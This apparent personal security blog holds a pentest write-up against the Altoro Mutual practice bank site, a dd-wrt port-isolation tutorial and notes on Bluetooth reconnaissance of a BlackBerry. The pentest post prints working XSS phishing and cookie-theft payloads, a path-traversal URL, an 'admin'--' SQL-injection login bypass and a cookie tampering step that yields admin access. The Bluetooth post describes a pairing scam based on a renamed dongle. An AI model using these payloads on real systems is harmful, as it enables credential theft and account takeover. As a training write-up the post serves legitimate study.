Sunday, December 12, 2010

A glance at Altoro Mutual

* Robots.txt file has not been found but error page reveals Microsoft Internet Information Services in Use. Robots file sometimes expose juicy information.
image

* Server headers provide quite a lot of information: underlying technologies, versions, and a suspicious second cookie named “amSessionId”.

image
* While performing the test I just gapped by chance in this Google reply that includes the X-XSS-Protection with a 0 value, this causes IE 8 to allow displaying XSS suspicious content. There is a bit of discussion regarding this protection mechanism as it is said to block some benign contents so this is why Google may include this header. The X-Content-Type-Options set to nosniff is another header related to IE8 that helps mitigating certain attacks related to MIME type abuses.
image
* Sometimes you can get interesting information from contents metadata; in this case for example we see that the images have been edited with Photoshop 3.0. In other occasions one can get usernames and similar stuff to be used in the engagement.
image
* The main search function is vulnerable to XSS
image
Here is the cookie, the ASP.NET cookie has not been revealed because of the httponly flag that was set that avoids JavaScript usage of the cookie.
image
A more elaborated attack can be performed as follows. First inject the following string that will display a fake login page to trick the user (victim).
http://testfire.net/search.aspx?txtSearch=%3Ch1%3EDearest%20user%20please%20provide%20password%20;)%3Ch1%3E%3Cdiv%20background-color%3A%23FF3300%3E%3Cform+action%3D%E2%80%9Dhttp%3A%2F%2F127.0.0.1%2Fevil.php%E2%80%9D%3EUsername%3A%3Cbr%3E%3Cinput+type%3D%E2%80%9Dtext%E2%80%9D+name%3D%E2%80%9Duser%E2%80%9D%3E%3Cbr%3EPassword%3A%3Cbr%3E%3Cinput+type%3D%E2%80%9Dtext%E2%80%9D+name%3D%E2%80%9Dpass%E2%80%9D%3E%3Cbr%3E%3Cinput+type=SUBMIT%20value=%22login%22%20/%3E%3C/form%3E%3C/div%3E
image
We set up a listening socket, with netcat in this example.
image
The user will then input his user and password.
image
And the attacker therefore captures them.
image
If we wanted to provide more impressive results we can start Beef exploitation framework in order to control a victim’s browser.
* The way of the application to locate contents seems vulnerable to path traversal. The application seems to like to server html files but when manipulating the parameter an unfiltered error is displayed with interesting information.
http://demo.testfire.net/default.aspx?content=../../../../../boot.ini.txt
image
Insecure redirection or remote file inclusion was also tested with no luck
http://demo.testfire.net/default.aspx?content=http://www.deloite.com/index.htm
image
Here the attack (insecure redirection) seems possible here:
http://demo.testfire.net/disclaimer.htm?url=http://www.netscape.com
Abusing the URL like this
http://demo.testfire.net/disclaimer.htm?url=http://en.wikipedia.org/wiki/Kiwi
image
* But a warning message appears, which is vulnerable to injection, and we can perform the redirection.
http://demo.testfire.net/disclaimer.htm?url=www.as.com;testfire.net<script>document.location="http://en.wikipedia.org/wiki/Kiwi";</script>
image
* In the subscription feature they check client side what characters the user is introducing, but no server side leading to an error.
image
image
* Therefore by introducing a “’” we have a nice Database error that could derive into a SQL Injection attack.
image
It seems to be an underlying insert clause but does not respond as expected to Boolean clauses
image
image
We could try to perform additional SQL commands by appending a “;drop database” but It wouldn’t be fair for Altoro. Again there is a XSS here.
* Again we have another Cross Site Scripting in a message:
POST http://demo.testfire.net:80/subscribe.aspx
txtEmail=aaa%40mailinator.com<script>alert(document.cookie);</script>&btnSubmit=Subscribe
image
* They do not mark the field with the autocomplete=off tag, here is not so dangerous but it is in login forms.
image
* Directory indexing misconfiguration has been located with sensitive information:
image
* There is a local reference to a file that also reveals a user name:
image
* In the feedback form there is also another XSS.
image
* Incomplete web page coding so that the page lacks of functionality, can impact the public image of the Bank. The button does not work as the html form does not have even an action tag definition.
image
* Login information is transmitted in clear text:
image
* It reveals when a username is not in the system, it can lead to ease brute forcing attacks on username field.
image
We see admin works so we just have to concentrate on password
image
* It seems vulnerable to SQL Injection attack
image
It is very easy to circumvent login page according to the previous behavior exposed by the web page, we just have to use the following:
· User: “admin’--“ (exclude the double quotes).
· Password: whatever as its going to be ignored because of the “—“ symbols that are meant to comment lines in SQL.
We see we have logged in with admin account:
image
* By the way an easy password guessing shows us that we can log in with admin/admin credentials.
We see that admin login is in fact an administration menu of the application in which we could change other user’s password and thus log in as them as well.
image
Changing user password does not seem to work (to avoid abuses from pentesters I guess) but usernames are valuables to access by the “—“ technique.
image
image
* There is another directory indexing vulnerability
image
* There is a web service (not authenticated).
http://demo.testfire.net/bank/ws.asmx
image
It contains the web service methods definition and the soap messages needed:
image
This can be attacked to obtain usernames by means of soap messages and possibly performing XML injection attacks
A captcha exists as well to avoid malicious users do brute forcing on the password field with automated tools:
image
* In the capcha window source code we see a password in an html comment:
Altoro1234
image
With this info and the capcha number we can successfully login
image
* A possible XML/XPATH injection exists:
image
image
With this we would obtain the first item
image
By crafting a more complex syntax we would for example find recursively the rest items. The contents are anyway indexed and available:
image
* Header injection vulnerability exists that allows modifying the page returned by the server.
image
image
* Regarding to session management we show below admin and sjoe cookies to detect possible vulnerabilities:
- admin cookie
Cookie: ASP.NET_SessionId=35f2wi55vpoyoyrg0ve54szg; amSessionId=446643804; amUserInfo=UserName=YWRtaW4=&Password=YWRtaW4=; amUserId=1
- sjoe cookie
Cookie: ASP.NET_SessionId=hvejm345qencll55npbtsqe0; amSessionId=582146246; amUserInfo=UserName=c2pvZSctLQ==&Password=bmFkYQ==; amUserId=100116013; amCreditOffer=CardType=Platinum&Limit=12000&Interest=5.4
We can highlight the following weaknesses:
· Username and password information is resent on every query, this only should happen when login in and the server session context must maintain this information.
· A suspicious amUserId is just used to difference one user from another, see image below.
· Special offers are set on client side by mans of amCreditOffer,CardType and Limit.
· The seemingly hashed information contained in username or password is just a base64 encoding so it is easy to intercept and reverse. (c2pvZSctLQ== is translated to sjoe'--)
* Having logged in as sjoe user we just have to ask for a privileged page like http://demo.testfire.net:80/admin/admin.aspx and modify sjoe amUserId field to set it to admin’s one (1) and we can access that critical page impersonating admin user.
image

How to Isolate a port in Linksys WRT54G/GL/GS

Introduction

Linksys routers can be enhanced by great firmwares that enable a lot of interesting/never ending features. So then what are you waiting for for upgrading your linksys box?
There are plenty of documentation on how to do it, this brief tutorial is based on dd-wrt firmware but I’m sure you can achieve similar results in others as well:
What I will explain next is how to isolate a port in the Linksys device, so that a computer connecting to that port will be able to access to the Internet but not see the machines in the rest of ports.

Usefull commands

nvram show #show all config
nvram get <variable> #gets variable content
nvram set <variable>=<value> #sets variable content
nvram set <variable>= #blanks a variable
nvram unset <variable> #erases the variable completely
nvram commit #saves the changes to nvram so they are kept after reseting the router

The architecture

Here you can see how is this type of Linksys device internally:
WRT54_sw2_internal_architecture.png
What we see is that case labels (port numbers that we see in the rear view of the linksys device) do not match with the port numbers that dd-wrt firmware uses internally for them. This means that port 4 (externally) matches with port 0 (internally).
  • port 5 (internal) leads to the cpu of dd-wrt.
  • port 4 (internal) connects to the internet.
  • port 0 (internal) is where we will create the new vlan (vlan2) and will be isolated from the rest of user ports (1-3) and wifi.
  • port 0 (internal) will indeed need to see port 5 so that the CPU can route the packets to the internet through port 4.

Don't trust me! save your current config

Before changing any configuration following this tutorial I will be nice to you and strongly recommend to backup your config. I guess all firmwares (the original linksys one included) have the facility to backup you current configuration.
so do so!!!

The configuration

The first step is based on the premise that you already have installed dd-wrt in your Linksys/Other router.
Bearing all said before in mind we log into the router by means of telnet or ssh and do the following:
nvram set vlan0ports="3 2 1 5*"
nvram set vlan2ports="0 5"
With this our isolated port "0" will now belong to a new vlan called "vlan2".
The asterisk (*) signifies that the VLAN it is attached to is the default VLAN: if the switch receives a packet on port 5 that is not tagged it is put into the VLAN where the * is configured.
Now its time to define that we want to assign an IP to that vlan so that any computer that connects to that port can define its default gateway as 192.168.2.1 and be able to connect to the internet.
nvram set rc_startup='
ifconfig vlan2 192.168.2.1 netmask 255.255.255.0
ifconfig vlan2 up
'
On some other tutorials similar to this one, they tell you to log into de http configuration menu and configure the ports like this but i think its not required. Do this as well just in case the configuration doesn't work.
ddwrtsepvlan.gif

Securing/Allowing things a bit

To isolate the port but to the internet we define the following rule in the internal linksys firewall
nvram set rc_firewall='
/usr/sbin/iptables -I FORWARD -i vlan2 -o vlan1 -j ACCEPT
'
The next step is rebooting the device and cross fingers
reboot

Roll back changes/fucking device!!

If you happen to get desperate and you feel you have broken/bricked the router just do the following that will reset your nvram to the default settings
Locate a small button in the rear side of the router and press it with a pen or something similar for at least 10 seconds.

Next steps

If you wanted you could assign the new port/net a dhcp server, but that was not my need.

Troubleshooting

During some test I have been doing I lost connectivity with the web interface, this is when accessing with a web browser the page looked like it was not loading. The solution is the following:
  • Access the router by means of telnet or ssh.
  • Restart the http daemon
ps  #look for the pid of the httpd process in order to kill it
kill -9 <httpd_pid>
httpd -h /www #start the proccess again
  • Try to access now through your browser

Links

Bluetooth & Blackberry

 

Introduction

Hi, after so long creating a new post this time I just wanna talk about Bluetooth devices and blackberries...not the fruit huh!
Well in fact I am not sure if I will cover something interesting related to BB (Blackberry) I just will try to
Also have in mind that the bluetooth dongle I am using is a cheap-poor-not-great one.

The hardware

I just have this and will try to see what sort of tweaks and tricks we can perform...yeah the /Rooted ad, it was a great Con that took place in Spain I want to mention in my wiki, didn't hear about it? http://www.rootedcon.es/eng/index.html
100420100152.jpg

The tools

So far a brand new Backtrack 4 seems enough.
Bluetooth dongle id
root@bt:/# tail /var/log/syslog
Apr 10 13:18:36 bt kernel: eth0: no IPv6 routers present
Apr 10 13:21:57 bt kernel: Bluetooth: Core ver 2.15
Apr 10 13:21:57 bt kernel: NET: Registered protocol family 31
Apr 10 13:21:57 bt kernel: Bluetooth: HCI device and connection manager initialized
Apr 10 13:21:57 bt kernel: Bluetooth: HCI socket layer initialized
Apr 10 13:22:04 bt kernel: usb 2-2: new full speed USB device using uhci_hcd and address 2
Apr 10 13:22:04 bt kernel: usb 2-2: device descriptor read/64, error -71
Apr 10 13:22:05 bt kernel: usb 2-2: configuration #1 chosen from 1 choice
Apr 10 13:22:06 bt kernel: Bluetooth: Generic Bluetooth USB driver ver 0.5
Apr 10 13:22:06 bt kernel: usbcore: registered new interface driver btusb


root@bt:/# hciconfig -a
hci0:   Type: USB
BD Address: 00:00:00:00:00:00 ACL MTU: 0:0 SCO MTU: 0:0
DOWN
RX bytes:0 acl:0 sco:0 events:0 errors:0
TX bytes:0 acl:0 sco:0 commands:0 errors:0
//when "upping" the device more info is provided and more commands are accepted and do not time out.
root@bt:/# hciconfig hci0 up
root@bt:/# hciconfig -a
hci0:   Type: USB
BD Address: XX:XX:XX:XX:XX:XX ACL MTU: 192:8 SCO MTU: 64:8
UP RUNNING
RX bytes:348 acl:0 sco:0 events:11 errors:0
TX bytes:38 acl:0 sco:0 commands:11 errors:0
Features: 0xff 0xff 0x8f 0xf8 0x18 0x18 0x00 0x80
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'CSR - bc3'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.2 (0x2) HCI Rev: 0x639 LMP Ver: 1.2 (0x2) LMP Subver: 0x639
Manufacturer: Cambridge Silicon Radio (10)
//seems just a ROM memory is installed
root@bt:/# bccmd -d hci0 chiprev
Chip revision: 0x0015 (BC3-ROM)

//dfutools for managing the firmware do not work
root@bt:/# dfutool -d hci0 archive bt_dongle_orig_firmware.bin
Can't find any DFU devices

We can see the dongle from the picture above is a Cambrige Silicon Radio, with a bluecore 3 firmware




Faking our name

I thought I couldn't as this device wasn't supposed to have writable memory
root@bt:/# hciconfig hci0 name eslimasec
root@bt:/# hciconfig hci0 name
hci0:   Type: USB
BD Address: XX:XX:XX:XX:XX:XX ACL MTU: 192:8 SCO MTU: 64:8
Name: 'eslimasec'




Scanning
root@bt:/# hcitool scan
Scanning ...
XX:XX:XX:XX:XX:XX       BlackBerry 8520

when the device is in listen/waiting mode for other devices to discover it, it reveals this information.
root@bt:/# hcitool info XX:XX:XX:XX:XX:XX
Requesting information ...
BD Address:  XX:XX:XX:XX:XX:XX
Device Name: BlackBerry 8520
LMP Version: 2.1 (0x4) LMP Subversion: 0x12e9
Manufacturer: Cambridge Silicon Radio (10)
Features: 0xbf 0xfe 0x8f 0xfe 0x98 0x19 0x00 0x80
<3-slot packets> <5-slot packets> <encryption> <slot offset>
<timing accuracy> <role switch> <sniff mode> <RSSI>
<channel quality> <SCO link> <HV2 packets> <HV3 packets>
<u-law log> <A-law log> <CVSD> <paging scheme> <power control>
<transparent SCO> <broadcast encrypt> <EDR ACL 2 Mbps>
<EDR ACL 3 Mbps> <enhanced iscan> <interlaced iscan>
<interlaced pscan> <inquiry with RSSI> <extended SCO>
<AFH cap. slave> <AFH class. slave> <3-slot EDR ACL>
<5-slot EDR ACL> <AFH cap. master> <AFH class. master>
<extended features>




BlackBerry (& other devs) Attacks

Scam attack by changing our dongle name.

It was tested that the blackberry devices have a sort of cache that allows them to remember the name of you dongle from the first time you tried to get paired.
//change the name of the dongle to make the user set the code you want, then just ask for info and that pairing message will appear on the victim screen
root@bt:/# hcitool info XX:XX:XX:XX:XX:XX

Great Links